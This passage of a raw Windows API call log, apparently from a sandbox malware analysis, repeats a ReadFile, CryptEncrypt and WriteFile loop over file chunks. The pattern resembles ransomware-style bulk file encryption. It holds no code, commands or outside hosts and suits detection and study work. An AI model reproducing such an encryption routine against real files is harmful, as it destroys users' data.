hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.997] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.999] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.999] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.999] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.999] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.999] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.003] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.004] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.004] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.004] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.005] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.006] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.007] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.008] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.009] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 